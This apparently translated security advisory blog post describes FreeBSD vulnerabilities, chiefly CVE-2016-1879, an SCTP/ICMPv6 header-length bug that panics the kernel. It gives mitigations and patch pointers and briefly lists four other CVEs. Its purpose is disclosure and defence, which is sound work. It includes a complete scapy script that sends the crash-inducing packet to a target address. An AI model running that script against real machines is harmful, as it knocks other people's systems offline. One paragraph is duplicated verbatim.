Critically dangerous vulnerabilities discovered in FreeBSD

The FreeBSD project team reports that a number of critically dangerous vulnerabilities have been discovered in the operating system, allowing attackers to launch denial-of-service attacks, elevate privileges, and disclose sensitive data.

Incorrect handling of ICMPv6 messages in the SCTP stack (CVE-2016-1879)

SCTP (Stream Control Transmission Protocol - “Stream Control Transmission Protocol”) is a transport layer protocol that is designed to transmit telephone network signaling messages in an IP environment. Basically, this protocol is used in technological networks of telecom operators.

FreeBSD versions 9.3, 10.1, and 10.2 are affected by this vulnerability if they are configured with SCTP and IPv6 support (default configuration). To exploit the error, an attacker needs to send a specially crafted ICMPv6 message. Successful operation allows you to implement a denial of service (DoS) attack.
')
DoS occurs due to insufficient verification of the length of the SCTP packet header received in the ICMPv6 error message. When the destination is unavailable, the router can generate an error message and forward it to the sender via ICMPv6.

The original IPv6 packet is enclosed in such an ICMPv6 packet, in which the Next Header field indicates how the upper layer protocol is encapsulated. In this case, it is SCTP.



When the kernel receives an error message via ICMPv6, it finds a top-level protocol packet in it and sends it to the appropriate handler (in this case, sctp6_ctlinput ()).

When the kernel receives an error message via ICMPv6, it finds a top-level protocol packet in it and sends it to the appropriate handler (in this case, sctp6_ctlinput ()). The SCTP handler assumes that the input packet contains a header of sufficient length, tries to copy it using m_copydata (), into which the offset values ​​and the number of bytes to be read are transmitted. Since a 12-byte data block is expected, if you send a packet with an SCTP header less than 12 bytes, a null pointer is dereferenced, which causes a critical system kernel failure (kernel panic).

To exploit the vulnerability, having an open SCTP socket is optional.
You can create an ICMPv6 packet for an attack using scapy. Habré has a lot of articles devoted to this powerful tool (for example, this and this article).

#!/usr/bin/env python # -*- coding: utf-8 -*- import argparse from scapy.all import * def get_args(): parser = argparse.ArgumentParser(description='#' * 78, epilog='#' * 78) parser.add_argument("-m", "--dst_mac", type=str, help="FreeBSD mac address") parser.add_argument("-i", "--dst_ipv6", type=str, help="FreeBSD IPv6 address") parser.add_argument("-I", "--iface", type=str, help="Iface") options = parser.parse_args() if options.dst_mac is None or options.dst_ipv6 is None: parser.print_help() exit() return options if __name__ == '__main__': options = get_args() sendp(Ether(dst=options.dst_mac) / IPv6(dst=options.dst_ipv6) / ICMPv6DestUnreach() / IPv6(nh=132, src=options.dst_ipv6, dst='fe80::230:56ff:fea6:648c'), iface=options.iface) 

Video demonstration of the attack:



In order to protect yourself from an attack using this security error, do the following:

• disable IPv6 addressing if it is not required;
• block ICMPv6 or IPv6 traffic on the firewall;
• disable SCTP stack support in the operating system kernel - if it is not needed (recompilation of the kernel will be required).

To eliminate the vulnerability, you can use a patch from the manufacturer, which introduces additional checks in the processing of ICMPv6 messages to the SCTP stack. And you will need to recompile the kernel.

That's not all

In addition, a number of serious vulnerabilities have been discovered in the system. The FreeBSD developers have released several patches that fix these errors:

1. Vulnerability to allow DoS-attack due to an error occurring when processing TCP connections with the TCP_MD5SIG and TCP_NOOPT socket options enabled. For successful operation, an attacker needs to open a listening socket with the TCP_NOOPT option enabled. (CVE-2016-1882, patch );
2. Vulnerability that allows a local user to elevate privileges or cause a denial of service: This is possible due to an access control error that allows overwriting random chunks of memory using specially crafted system calls for the Linux compatibility layer setgroups (2). (CVE-2016-1881, patch );
3. Due to an error in the lists of Linux robust futex, hackers get the opportunity to disclose system memory data (CVE-2016-1880, patch );
4. Insecure default security settings that allow access to the bsnmpd “/etc/bsnmpd.conf” daemon configuration file (CVE-2015-5677, patch ).

In order to avoid problems associated with the exploitation of these vulnerabilities, experts from Positive Technologies recommend using IPv6 addressing only if it is required for the operation of applications, installing security updates from the OS developers and using specialized tools to monitor system security (for example, MaxPatrol ) to control the security of the system.